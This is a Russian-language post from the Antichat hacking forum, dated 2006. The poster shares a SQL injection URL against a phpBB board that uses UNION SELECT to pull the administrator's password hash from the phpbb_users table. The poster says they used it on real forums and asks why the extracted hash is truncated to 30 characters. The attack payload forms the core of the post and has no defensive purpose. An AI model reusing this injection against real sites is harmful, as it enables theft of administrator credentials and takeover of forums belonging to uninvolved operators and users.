Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
sql inj in phpbb & hashs length |
16.04.2006, 12:51
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609
Репутация:
239
|
|
sql inj in phpbb & hashs length
Вот допустим есть такой линк:
Код:
http://www.*/forum/index.php?s=-1 UNION SELECT 0,user_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM phpbb_users WHERE user_id=2
получаю админский хэш, но длинной всего 30 символов.
Кто мне скажет - куда еще 2 байта девались?
Тестил на некоторых других форумах - там все чики-пуки.
Изучение сорсов phpbb результата не дали.
__________________
Никому нельзя верить...
Последний раз редактировалось qBiN; 17.04.2006 в 15:55..
Причина: написано ниже
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид